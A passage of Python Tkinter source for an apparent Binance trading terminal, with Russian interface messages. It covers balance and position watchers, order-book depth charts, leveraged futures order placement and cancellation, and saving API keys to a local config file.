xx1 = (float(mylist4_Sp[0][0])-yI_Sp_0)/(float(mylist4_Sp[0][0])/100)
ss_BU = time_local_str + 'SPOT: ' + "%.2f" % (xx1) + '%, '
xx2 = (float(mylist4_Ft[0][0])-yI_Ft_0)/(float(mylist4_Ft[0][0])/100)
ss_BU += 'FRS: ' + "%.2f" % (xx2) + '%, '
xx3 = (float(mylist4_Sp[0][0])-yI_Sp_1)/(float(mylist4_Sp[0][0])/100)
ss_BU += '\n' + time_local_str + 'SPOT: ' + "%.2f" % (xx3) + '%, '
xx4 = (float(mylist4_Ft[0][0])-yI_Ft_1)/(float(mylist4_Ft[0][0])/100)
ss_BU += 'FRS: ' + "%.2f" % (xx4) + '%, '
app.label_BU.config(text = ss_BU)
if (xx3<0 and xx4<0) or ((xx1<-0.25 and xx2<-0.25) and (-xx1>xx3 and -xx2>xx4)):
if app.label_BU['bg']=='SystemButtonFace':
app.label_BU['bg']='pink'
app.label_BU['fg']='SystemButtonText'
else:
app.label_BU['bg']='SystemButtonFace'
app.label_BU['fg']='red'
elif (xx1>0 and xx2>0) or ((xx3>0.25 and xx4>0.25)and (xx3>(-xx1) and xx4>(-xx2))):
if app.label_BU['bg']=='SystemButtonFace':
app.label_BU['bg']='lightgreen'
app.label_BU['fg']='SystemButtonText'
else:
app.label_BU['bg']='SystemButtonFace'
app.label_BU['fg']='green'
else:
app.label_BU['bg']='SystemButtonFace'
app.label_BU['fg']='SystemButtonText'
class Timer_AccBlns:
def __init__(self):
global TE_AB
i=0
while True:
if PS_AB == False:
sys_msg = ' Наблюдатель балансов остановлен.'
app.Sys_Msg(text1=sys_msg)
TE_AB = True
break
if should_run_AB:
#for i in range(400):
if not should_run_AB:
#print('Stopped...')
sys_msg = ' Наблюдатель балансов будет остановлен.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_AB:
if i==0:
sys_msg = ' Наблюдатель балансов запущен.'
app.Sys_Msg(text1=sys_msg)
TE_AB = False
if i > 0:
time.sleep(0.5)
BnAcc = bot.account()
BnAcc10 = BnAcc['balances']
ss = 'SPOT balance: ' #0 USDT'
#print(BnAcc10)
for mm in range(len(BnAcc10)):
BnAcc101 = BnAcc10[mm]
if BnAcc101['asset'] =='USDT':
#print (BnAcc10[mm])
ss += str(BnAcc101['asset']) + "\nДоступно: " + str(BnAcc101['free']) + "USDT.\nНе доступно: " + str(BnAcc101['locked']) + ' USDT.'
app.label_BlnsSpt.config(text = ss)
BnFAcc = bot.futuresBalance()
#print(BnFAcc)
ss = 'FUTURE balance: ' #0 USDT'
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if BnFAcc1['asset'] == 'USDT':
#print(BnFAcc[mm])
ss += str(BnFAcc1['asset']) + '.'
ss += "\nВсего: " + str(BnFAcc1['balance']) + ".\nДоступно: " + str(BnFAcc1['withdrawAvailable'])
app.label_2.config(text = ss)
BnFAcc = bot.futuresAccount()
#print(BnFAcc)
ss = 'FUTURES positions:\n'
if len(BnFAcc)>0:
BnFAcc1 = BnFAcc['totalUnrealizedProfit']
ss += 'PnL: ' + str(BnFAcc1) + ' USDT'
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str_H=time_local_time.strftime("%H")
ss += '\n'
if float(time_local_str_H)>=11 and float(time_local_str_H)<=19:
ss += 'London '
if (float(time_local_str_H)>=16 and float(time_local_str_H)<=23) or float(time_local_str_H)==0:
ss += 'New York '
if float(time_local_str_H)>=0 and float(time_local_str_H)<=8: #1..9
ss += 'Sydney '
if float(time_local_str_H)>=2 and float(time_local_str_H)<=10: #3..11
ss += 'Tokyo '
app.label_PnL.config(text = ss)
BnFAcc=bot.userPositionInfo()
TrSc_P = app.Tree_Ord_VScrl.get()
TrSc_P=app.Tree_Ord.yview()
#print(TrSc_P)
app.List_Ord.delete(0,END)
TP_CL=app.Tree_Ord.get_children()
TP_CC=len(TP_CL)
l = TP_CC+1
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
#print(BnFAcc1)
if len(BnFAcc1)>0:
TP_SCh = True
if TP_CC > 0:
for nn in range(1,TP_CC+1):
TP_It = app.Tree_Ord.item(nn)["values"]
if TP_It[0] == str(BnFAcc1['symbol']) and TP_It[2] == str(BnFAcc1['positionSide']):
app.Tree_Ord.item(nn, values=(str(BnFAcc1['symbol']),str(BnFAcc1['unRealizedProfit']),str(BnFAcc1['positionSide']),str(BnFAcc1['entryPrice']),
str(float(BnFAcc1['positionAmt'])*float(BnFAcc1['entryPrice'])),str(BnFAcc1['liquidationPrice'])))
TP_SCh = False
#print(TP_It[0])
if TP_SCh == True and float(BnFAcc1['positionAmt']) != 0:
#print(TP_It)
#print(str(BnFAcc1['symbol']),str(BnFAcc1['unRealizedProfit']),str(BnFAcc1['positionSide']))
app.Tree_Ord.insert(parent='',index='end',iid=l,text='',values=(str(BnFAcc1['symbol']),str(BnFAcc1['unRealizedProfit']),str(BnFAcc1['positionSide']),str(BnFAcc1['entryPrice']),
str(float(BnFAcc1['positionAmt'])*float(BnFAcc1['entryPrice'])),str(BnFAcc1['liquidationPrice'])))
l +=1
TP_CL=app.Tree_Ord.get_children()
TP_CC=len(TP_CL)
TP_Tpl_Tmp=[]
for nn in range(1,TP_CC+1):
TP_It = app.Tree_Ord.item(nn)["values"]
TP_Tpl_Tmp.append(app.Tree_Ord.item(nn)["values"])
#print(TP_Tpl_Tmp[nn-1])
#print(len(app.Tree_Ord.get_children()))
kk=0
nm=False
for nn in range(1,TP_CC+1):
TP_It = app.Tree_Ord.item(nn)["values"]
if float(TP_It[3]) == 0 and float(TP_It[4]) == 0 and kk<=len(TP_Tpl_Tmp):
nm=True
km=False
for mm in range(kk,len(TP_Tpl_Tmp)):
#print(mm)
if float(TP_Tpl_Tmp[mm][3])!=0 and float(TP_Tpl_Tmp[mm][4])!=0 and km==False:
app.Tree_Ord.item(nn, values=(TP_Tpl_Tmp[mm][0],TP_Tpl_Tmp[mm][1],TP_Tpl_Tmp[mm][2],TP_Tpl_Tmp[mm][3],TP_Tpl_Tmp[mm][4],TP_Tpl_Tmp[mm][5]))
kk=mm+1
#print(nn,kk,mm)
km=True
if nm==True and km==False:
kk=len(TP_Tpl_Tmp)+1
else:
#print(nn,kk)
if nm==True and kk<TP_CC:
app.Tree_Ord.item(nn, values=(TP_Tpl_Tmp[kk][0],TP_Tpl_Tmp[kk][1],TP_Tpl_Tmp[kk][2],TP_Tpl_Tmp[kk][3],TP_Tpl_Tmp[kk][4],TP_Tpl_Tmp[kk][5]))
kk +=1
if kk>len(TP_Tpl_Tmp) and nn<=TP_CC+1:
app.Tree_Ord.delete(nn)
app.Tree_Ord.yview_moveto((TrSc_P[0]))
#print(TrSc_P[0])
if i == 0:
i = 1
class Timer_OrdTmr:
def __init__(self):
global TE_OrdTmr
while True:
if PS_OT == False:
sys_msg = ' График ордеров в стакане ' + grSmb + ' остановлен.'
app.Sys_Msg(text1=sys_msg)
TE_OrdTmr = True
break
if should_run_OT:
for i in range(400):
if not should_run_OT:
sys_msg = ' График ордеров в стакане ' + grSmb + ' будет остановлен.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_OT:
if i==0:
sys_msg = ' График ордеров в стакане ' + grSmb + ' запущен.'
app.Sys_Msg(text1=sys_msg)
TE_OrdTmr = False
if i > 0:
time.sleep(0.5)
if MS=='SPOT':
myTup11 = ('depth', bot.depth(symbol=grSmb, limit=1000)) #tupl (IF LIMIT<=50 THEN WEIGHT = 2; LIMIT=100 WEIGHT = 5;LIMIT=500 WEIGHT = 10;LIMIT=1000 WEIGHT = 20)
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
elif MS=='FUTURES':
myTup11 = ('FutDepth', bot.futuresDepth(symbol=grSmb, limit=1000)) #tupl
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
#Order Book Graph
app.graph_2.delete("all")
for m in range (int(len(mylist5))):
if float(mylist5[m][1])>0:
if (float(mylist5[m][1])*float(mylist5[m][0]))>50000:
points=[]
x0 = 180
y0 = grMd - ((float(mylist5[m][0])-y0I_TP)/(prSt*10))* (grSt/10)
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist5[m][1])/(grOW/100))*10
y1 = grMd - ((float(mylist5[m][0])-y0I_TP)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="pink",width=(grSt/10))
for m in range (int(len(mylist4))):
if float(mylist4[m][1])>0:
if (float(mylist4[m][1])*float(mylist4[m][0]))>50000:
points=[]
x0 = 180
y0 = grMd - ((float(mylist4[m][0])-y0I_TP)/(prSt*10))* (grSt/10)
#print('-', yI0, ' - ', float(mylist4[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist4[m][1])/(grOW/100))*10
#print(float(mylist4[m][1]))
y1 = grMd - ((float(mylist4[m][0])-y0I_TP)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="lightgreen",width=(grSt/10))
class Timer_Zoom:
def __init__(self):
global ss
global yI
global Lo
global yI0Zm
global TE_Zm
while True:
if Ord_Zm == False:
sys_msg = ' Zoom ордеров ' + grSmb + ' остановлен.'
app.Sys_Msg(text1=sys_msg)
TE_Zm = True
break
if should_run_OZ:
for i in range(400):
if not should_run_OZ:
sys_msg = ' Zoom ордеров ' + grSmb + ' будет остановлен.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_OZ:
if i==0:
TE_Zm = False
sys_msg = ' Zoom ордеров ' + grSmb + ' запущен.'
app.Sys_Msg(text1=sys_msg)
if i > 0:
time.sleep(0.01)
#Ссылка для просмотра в браузере: https://api.binance.com/api/v1/depth?symbol=ETHBTC
#limit - кол-во возвращаемых записей от 5 до 1000 (по умолчанию 100).
#Допустимые значения: 5, 10, 20, 50, 100, 500, 1000.
#Еще можно указать 0, но он может вернуть большое кол-во данных.
#Вес зависит от параметра limit. При лимите от 5 до 100 вес будет равен 1.
#Для параметра 500 вес составит 5. Для параметра 1000 вес будет 10.
#print (grSmb)
if MS=='SPOT':
myTup11 = ('depth', bot.depth(symbol=grSmb, limit=20)) #tupl
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
elif MS=='FUTURES':
myTup11 = ('FutDepth', bot.futuresDepth(symbol=grSmb, limit=20)) #tupl
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
#print (mylist4)
if i==0:
yI0Zm=float(mylist4[19][0])
grMd = grH/2
grSt = grZm/(yI0Zm*0.01/prSt)
TT0 = time.mktime(time.localtime())*1000
grStZ=1000/40
#Order Book Graph
app.graph_Zm.delete("all")
yI0Zm=float(mylist4[0][0])
for m in range (int(len(mylist5))):
if float(mylist5[m][1])>0:
points=[]
x0 = 180
y0 = grMd - ((float(mylist5[m][0])-yI0Zm)/prSt)* grStZ
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist5[m][1])/(grOW/200))*10
y1 = grMd - ((float(mylist5[m][0])-yI0Zm)/prSt)* grStZ
pp=(x1,y1)
points.append(pp)
app.graph_Zm.create_line(points,fill="pink",width=grStZ)
if prSt >= 0.1:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.2f" % float(mylist5[m][0]))
elif 0.1 > prSt >= 0.01:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.2f" % float(mylist5[m][0]))
elif 0.01 > prSt >= 0.001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.3f" % float(mylist5[m][0]))
elif 0.001 > prSt >= 0.0001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.4f" % float(mylist5[m][0]))
elif prSt < 0.0001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.8f" % float(mylist5[m][0]))
if float(mylist4[m][1])>0:
points=[]
x0 = 180
y0 = grMd - ((float(mylist4[m][0])-yI0Zm)/prSt)* grStZ
#print('-', yI0, ' - ', float(mylist4[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist4[m][1])/(grOW/200))*10
#print(float(mylist4[m][1]))
y1 = grMd - ((float(mylist4[m][0])-yI0Zm)/prSt)* grStZ
pp=(x1,y1)
points.append(pp)
app.graph_Zm.create_line(points,fill="lightgreen",width=grStZ)
if prSt >= 0.1:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.2f" % float(mylist4[m][0]))
elif 0.1 > prSt >= 0.01:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.2f" % float(mylist4[m][0]))
elif 0.01 > prSt >= 0.001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.3f" % float(mylist4[m][0]))
elif 0.001 > prSt >= 0.0001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.4f" % float(mylist4[m][0]))
elif prSt < 0.0001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.8f" % float(mylist4[m][0]))
class Timer_End:
def __init__(self):
while True:
if TE_Tck==True and TE_Cnd == True and TE_CndSm == True and TE_BU == True and TE_AB == True and TE_Zm == True and TE_OrdTmr == True:
root.destroy()
break
time.sleep(0.01)
def close_window():
global ep
global should_run_T
global should_run_C
global should_run_S
global should_run_BU
global should_run_AB
global should_run_OT
global should_run_OZ
global PS1
global PS_BU
global PS_AB
global PS_OT
global Ord_Zm
ep=messagebox.askokcancel(title=None, message='Вы действительно хотите выйти из программы?')
if ep==True:
should_run_T=False
PS1 = True
should_run_C=False
should_run_S=False
should_run_BU=False
PS_BU = False
should_run_AB=False
PS_AB = False
should_run_OT=False
PS_OT = False
should_run_OZ=False
Ord_Zm = False
TEPr = threading.Thread(target=Timer_End,daemon=True)
TEPr.start()
#______________BUTTON 1_CLICK BEGIN - Start/Stop TICK/CANDLE GRAPH
def click_button1():
global should_run_T
global should_run_C
global should_run_S
global myFont
global PS1
#print(GS)
myFont = font.Font(size=15)
app.button_1['font'] = myFont
if GS == 'TICK':
if should_run_T == True:
should_run_T = False
PS1 = True
app.button_1['font']=myFont
app.button_1.config(text="Start", fg='green')
else:
PS1 = False
t1 = threading.Thread(target=Timer_Tick,daemon=True)
t1.start()
app.button_1.config(text="Stop", fg='red')
should_run_T = True
elif GS == 'CANDLE 1m' or GS == 'CANDLE 5m' or GS == 'CANDLE 5m' or GS == 'CANDLE 15m' or GS == 'CANDLE 30m' or GS == 'CANDLE 1h' or GS == 'CANDLE 4h' or GS == 'CANDLE 1d':
if should_run_C == True:
should_run_C = False
PS1 = True
app.button_1['font']=myFont
app.button_1.config(text="Start", fg='green')
else:
PS1 = False
t2 = threading.Thread(target=Timer_Candle,daemon=True)
t2.start()
app.button_1.config(text="Stop", fg='red')
should_run_C = True
elif GS == 'CANDLE SUMM':
if should_run_S == True:
should_run_S = False
PS1 = True
app.button_1['font']=myFont
app.button_1.config(text="Start", fg='green')
else:
PS1 = False
timer_3_CSumm = threading.Thread(target=Timer_Candle_Summ,daemon=True)
timer_3_CSumm.start()
app.button_1.config(text="Stop", fg='red')
should_run_S = True
#______________BUTTON 1_CLICK END - Start/Stop TICK/CANDLE GRAPH
#______________BUTTON 2_CLICK BEGIN - Start/Stop BTC WATCHER
def click_button2():
global PS_BU
global should_run_BU
myFont = font.Font(size=10)
app.button_2['font'] = myFont
#print (PS_BU, should_run_BU)
if PS_BU == True and should_run_BU == True:
PS_BU = False
should_run_BU = False
app.button_2.config(text="Start", fg='green')
elif PS_BU == False and should_run_BU == False:
PS_BU = True
should_run_BU = True
timer_BU = threading.Thread(target=Timer_BTCUSDT,daemon=True)
timer_BU.start()
app.button_2.config(text="Stop", fg='red')
#______________BUTTON 2_CLICK END - Start/Stop BTC WATCHER
#______________BUTTON AB_CLICK BEGIN - Start/Stop ACCOUNT BALANCES WATCHER + FUTURES POSITIONS WATCHER
def click_buttonAB():
global PS_AB
global should_run_AB
myFont = font.Font(size=10)
app.button_AB['font'] = myFont
#print (PS_AB, should_run_AB)
if PS_AB == True and should_run_AB == True:
PS_AB = False
should_run_AB = False
app.button_AB.config(text="Start", fg='green')
elif PS_AB == False and should_run_AB == False:
PS_AB = True
should_run_AB = True
timer_AB = threading.Thread(target=Timer_AccBlns,daemon=True)
timer_AB.start()
app.button_AB.config(text="Stop", fg='red')
#______________BUTTON 2_CLICK END - Start/Stop BTC WATCHER + FUTURES WALLET WATCHER
#______________BUTTON OrdTmr_CLICK BEGIN - Start/Stop DEPTH TIMER
def click_button_OrdTmr():
global PS_OT
global should_run_OT
myFont = font.Font(size=10)
app.button_OrdTmr['font'] = myFont
#print (PS_BU, should_run_BU)
if PS_OT == True and should_run_OT == True:
PS_OT = False
should_run_OT = False
app.button_OrdTmr.config(text="Start", fg='green')
elif PS_OT == False and should_run_OT == False:
PS_OT = True
should_run_OT = True
timer_OT = threading.Thread(target=Timer_OrdTmr,daemon=True)
timer_OT.start()
app.button_OrdTmr.config(text="Stop", fg='red')
#______________BUTTON OrdTmr_CLICK END - Start/Stop DEPTH TIMER
#______________BUTTON Zm_CLICK BEGIN - Start/Stop DEPTH ZOOM
def click_button_Zm():
global Ord_Zm
global should_run_OZ
wh = root.winfo_height()
ww = root.winfo_width()
if Ord_Zm == False:
should_run_OZ = True
Ord_Zm = True
app.graph_Zm.place(x=ww-420,y=150,width=200,height=wh-320)
app.graph_2.place_forget()
app.button_Ord.config(text="Norm")
timer_Zm = threading.Thread(target=Timer_Zoom,daemon=True)
timer_Zm.start()
else:
should_run_OZ = False
Ord_Zm = False
app.button_Ord.config(text="Zoom")
app.graph_2.place(x=ww-420,y=150,width=200,height=wh-320)
app.graph_Zm.place_forget()
#______________BUTTON Zm_CLICK END - Start/Stop DEPTH ZOOM
#______________BUTTON NwOL_CLICK BEGIN (New Order Long) - SET NEW LONG FUTURES ORDER
def click_buttonNwOL():
#Close position By default the futures keeps the position mode to One-way. In order to enable the new feature of Hedge Mode, so you can have dual sides positions.
#enable it by endpoint POST /fapi/v1/positionSide/dual, setting the parameter dualSidePosition = true
#Open position: Long : positionSide=LONG, side=BUY Short: positionSide=SHORT, side=SELL
#Close position: Close long position: positionSide=LONG, side=SELL Close short position: positionSide=SHORT, side=BUY
if MS == 'FUTURES':
k1_f = float(app.text_POrd.get(1.0,'end'))
k1_s = app.text_POrd.get(1.0,'end')
k2_f = float(app.text_QOrd.get(1.0,'end'))
k2_s = app.text_QOrd.get(1.0,'end')
k3_f=(k2_f*int(Lvrg))/k1_f
#print(k3_f,' ', orLSS)
if float(orLSS) >= 1:
k3_s = int(k3_f)
elif 1> float(orLSS) >= 0.1:
k3_s = "%.1f" % (k3_f)
elif 0.1 > float(orLSS) >= 0.01:
k3_s = "%.2f" % (k3_f)
elif 0.01 > float(orLSS) >= 0.001:
k3_s = "%.3f" % (k3_f)
elif 0.001 > float(orLSS) >= 0.0001:
k3_s = "%.4f" % (k3_f)
elif 0.00001 <= float(orLSS) < 0.0001:
k3_s = "%.5f" % (k3_f)
elif 0.000001 <= float(orLSS) < 0.00001:
k3_s = "%.6f" % (k3_f)
elif 0.0000001 <= float(orLSS) < 0.000001:
k3_s = "%.7f" % (k3_f)
elif float(orLSS) < 0.0000001:
k3_s = "%.8f" % (k3_f)
#print(k3_s)
if k1_f > 0 and k2_f > 0:
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='BUY', positionSide='LONG', type='LIMIT', timeInForce='GTC', quantity=k3_s, price=k1_f, newOrderRespType='FULL')
sys_msg = ' Ордер на покупку ' + grSmb + ' в LONG по цене ' + str(k1_f) + ' USDT в количестве ' + str(k3_s) + ' актива установлен.'
sys_msg += ' Маржа ' + str(k2_f) +' USDT, сумма ордера ' + str(k3_f*k1_f) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
#______________BUTTON NwOL_CLICK END (New Order Long) - SET NEW LONG FUTURES ORDER
#______________BUTTON NwOL_CLICK BEGIN (New Order Short) - SET NEW SHORT FUTURES ORDER
def click_buttonNwOS():
if MS == 'FUTURES':
k1_f = float(app.text_POrd.get(1.0,'end'))
k1_s = app.text_POrd.get(1.0,'end')
k2_f = float(app.text_QOrd.get(1.0,'end'))
k2_s = app.text_QOrd.get(1.0,'end')
k3_f=(k2_f*int(Lvrg))/k1_f
#print(k3_f)
if float(orLSS) >= 1:
k3_s = int(k3_f)
elif 1> float(orLSS) >= 0.1:
k3_s = "%.1f" % (k3_f)
elif 0.1 > float(orLSS) >= 0.01:
k3_s = "%.2f" % (k3_f)
elif 0.01 > float(orLSS) >= 0.001:
k3_s = "%.3f" % (k3_f)
elif 0.001 > float(orLSS) >= 0.0001:
k3_s = "%.4f" % (k3_f)
elif 0.00001 <= float(orLSS) < 0.0001:
k3_s = "%.5f" % (k3_f)
elif 0.000001 <= float(orLSS) < 0.00001:
k3_s = "%.6f" % (k3_f)
elif 0.0000001 <= float(orLSS) < 0.000001:
k3_s = "%.7f" % (k3_f)
elif float(orLSS) < 0.0000001:
k3_s = "%.8f" % (k3_f)
if k1_f > 0 and k2_f > 0:
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='SELL', positionSide='SHORT', type='LIMIT', timeInForce='GTC', quantity=k3_s, price=k1_f, newOrderRespType='FULL')
sys_msg = ' Ордер на покупку ' + grSmb + ' в SHORT по цене ' + str(k1_f) + ' USDT в количестве ' + str(k3_s) + ' актива установлен.'
sys_msg += ' Маржа ' + str(k2_f) +' USDT, сумма ордера ' + str(k3_f*k1_f) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
#______________BUTTON NwOL_CLICK END (New Order Short) - SET NEW SHORT FUTURES ORDER
#______________BUTTON NwODel_CLICK BEGIN (New Order Delete) - DELETE NEW LONG/SHORT FUTURES ORDER
def click_buttonNwODel():
#print('delete order')
if should_run_C == True and MS=='FUTURES' and PosSide=='LONG':
BnFAcc=bot.userOpenOrders(symbol=grSmb)
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['type'])=='LIMIT' and str(BnFAcc1['positionSide'])=='LONG':
#print(BnFAcc1)
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position LONG Order LIMIT Removed [' + grSmb + '], Price: ' + str(BnFAcc1['price']) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if should_run_C == True and MS=='FUTURES' and PosSide=='SHORT':
BnFAcc=bot.userOpenOrders(symbol=grSmb)
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['type'])=='LIMIT' and str(BnFAcc1['positionSide'])=='SHORT':
#print(BnFAcc1)
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position SHORT Order LIMIT Removed [' + grSmb + '], Price: ' + str(BnFAcc1['price']) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
#______________BUTTON NwOShow_CLICK BEGIN (New Order Show) - SHOW/HIDE NEW FUTURES ORDER
def click_buttonNwOShow():
global NwOrSw
if should_run_C == True and MS == 'FUTURES' and NwOrSw==False:
if PosSide == 'LONG':
k1=float(app.text_POrd.get(1.0,'end'))
k2=float(app.text_QOrd.get(1.0,'end'))
k3=(k2*float(Lvrg_Tmp))/k1
yyC =float(k1)-((float(k1)*(float(k3)/(float(Lvrg_Tmp)+1)))/float(k3))
yyC1 = grMd - (((k1+(k1-yyC))-y0I_TP)/(prSt*10))* grSt
yyC2 = grMd - ((k1-y0I_TP)/(prSt*10))* grSt
app.graph_Cn.coords(GOS_TP, 850,yyC1,880,yyC2)
#print(PosSide)
yyC1 = grMd - ((k1-y0I_TP)/(prSt*10))* grSt
yyC2 = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
app.graph_Cn.coords(GOS_SL, 850,yyC1,880,yyC2)
if PosSide == 'SHORT':
#print(PosSide)
k1=float(app.text_POrd.get(1.0,'end'))
k2=float(app.text_QOrd.get(1.0,'end'))
k3=(k2*float(Lvrg_Tmp))/k1
yyC =float(k1)+((float(k1)*(float(k3)/(float(Lvrg_Tmp)+1)))/float(k3))
yyC1 = grMd - (((k1+(k1-yyC))-y0I_TP)/(prSt*10))* grSt
yyC2 = grMd - ((k1-y0I_TP)/(prSt*10))* grSt
app.graph_Cn.coords(GOS_TP, 850,yyC1,880,yyC2)
yyC1 = grMd - ((k1-y0I_TP)/(prSt*10))* grSt
yyC2 = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
app.graph_Cn.coords(GOS_SL, 850,yyC1,880,yyC2)
NwOrSw=True
#print(NwOrSw)
app.button_NwOSw.config(text="HIDE", fg='red')
elif should_run_C == True and MS == 'FUTURES' and NwOrSw==True:
NwOrSw=False
app.button_NwOSw.config(text="SHOW", fg='black')
app.graph_Cn.coords(GOS_SL, 0,0,0,0)
app.graph_Cn.coords(GOS_TP, 0,0,0,0)
#______________BUTTON NwOShow_CLICK END (New Order Show) - SHOW/HIDE NEW FUTURES ORDER
#______________BUTTONS END
#______________MENU BEGIN
#______________MENU ACCOUNT_CLICK BEGIN - SHOW NEW WINDOW WITH BINANCE ACCOUNT KEYS
def clicked_Bnacc():
global rootAcc
global app_acc
rootAcc = Tk()
app_acc = AccWn(rootAcc)
rootAcc.title('Binance balances')
rootAcc.geometry('550x120+150+100')
rootAcc.resizable(width=False, height=False)
rootAcc.mainloop()
#______________MENU ACCOUNT_CLICK END - SHOW NEW WINDOW WITH BINANCE ACCOUNT KEYS
#______________MENU ACCOUNT BUTTON SAVE CLICK BEGIN - SAVE KEYS
def click_button_AccSave():
global bot
global API_KEY_s
global API_SECRET_s
API_KEY_s = app_acc.text_AK.get(1.0,'end').replace("\n", "")
API_SECRET_s = app_acc.text_AS.get(1.0,'end').replace("\n", "")
if API_KEY_s != '' and API_SECRET_s != '':
bot = Binance(API_KEY=API_KEY_s, API_SECRET=API_SECRET_s)
my_file_Account = open("iTrader.cfg", "w")
sTmp = bot.API_KEY
sTmp += '\n'
sTmp += str(bot.API_SECRET, 'utf-8')
my_file_Account.write(sTmp)
my_file_Account.close()
messagebox.showinfo("Set account KEYs", "Данные успешно сохранены.")
rootAcc.destroy()
#______________MENU ACCOUNT BUTTON SAVE CLICK BEGIN - SAVE KEYS
#______________MENU BALANCES_CLICK BEGIN - SHOW NEW WINDOW WITH BALANCES
def clicked_blns():
rootBlns = Tk()
rootBlns.title('Binance balances')
rootBlns.geometry('800x850+150+100')
tab_control = ttk.Notebook(rootBlns)
tab1 = ttk.Frame(tab_control)
tab2 = ttk.Frame(tab_control)
tab3 = ttk.Frame(tab_control)
tab_control.add(tab1, text='SPOT')
lbl1 = Label(tab1, text='Вкладка 1',justify=LEFT)
lbl1.grid(column=0, row=0)
tab_control.add(tab2, text='FUTURES')
lbl2 = Label(tab2, text='Вкладка 2',justify=LEFT)
lbl2.grid(column=0, row=0)
tab_control.add(tab3, text='MARGIN')
tab_control.pack(expand=1, fill='both')
#Fill Tab 1 - SPOT WALLETS
BnAcc = bot.account()
BnAcc1 = BnAcc.get('makerCommission')
sTmp = '\n 1. (makerCommission):' + str(BnAcc1)
BnAcc2 = BnAcc['takerCommission']
sTmp += '\n 2. takerCommission:' + str(BnAcc2)
BnAcc3 = BnAcc['buyerCommission']
sTmp += '\n 3. buyerCommission:' + str(BnAcc3)
BnAcc4 = BnAcc['sellerCommission']
sTmp += '\n 4. sellerCommission:' + str(BnAcc4)
BnAcc5 = BnAcc['canTrade']
sTmp += '\n 5. canTrade:' + str(BnAcc5)
BnAcc6 = BnAcc['canWithdraw']
sTmp += '\n 6. canWithdraw:' + str(BnAcc6)
BnAcc7 = BnAcc['canDeposit']
sTmp += '\n 7. canDeposit:' + str(BnAcc7)
BnAcc8 = BnAcc['updateTime']
sTmp += '\n 8. updateTime:' + str(BnAcc8)
BnAcc9 = BnAcc['accountType']
sTmp += '\n 9. accountType:' + str(BnAcc9)
BnAcc10 = BnAcc['balances']
sTmp += '\n 10. balances_len:' + str(len(BnAcc10))
BnAcc101=BnAcc10[0]
for mm in range(len(BnAcc10)):
BnAcc101 = BnAcc10[mm]
if float(BnAcc101['free']) > 0 or float(BnAcc101['locked']) > 0:
sTmp += '\n баланс: ' + str(BnAcc101['asset']) + ". Доступно: " + str(BnAcc101['free']) + ". Не доступно: " + str(BnAcc101['locked'])
BnAcc11 = BnAcc['permissions']
sTmp += "\n 11 permissions_len " + str(len(BnAcc11)) + 'permissions:'+ str(BnAcc11)
for mm in range(len(BnAcc11)):
if BnAcc11[mm] == 'SPOT':
sTmp += "\n 11 permissions_SPOT = TRUE (Спотовая торговля)"
if BnAcc11[mm] == 'LEVERAGED':
sTmp += "\n 11 permissions_LEVERAGED = TRUE (Маржинальная торговля?)"
lbl1.config(text = sTmp)
#Fill Tab 2 - FUTURES WALLETS
sTmp = ''
BnFAcc = bot.futuresBalance()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
sTmp += '\n баланс: ' + str(BnFAcc1['asset']) + ". Всего: " + str(BnFAcc1['balance']) + ". Доступно: " + str(BnFAcc1['withdrawAvailable'])
lbl2.config(text = sTmp)
rootBlns.mainloop()
#______________MENU BALANCES_CLICK END - SHOW NEW WINDOW WITH BALANCES
#______________MENU ORDERS_CLICK BEGIN - SHOW NEW WINDOW WITH ORDERS
def clicked_Ordrs():
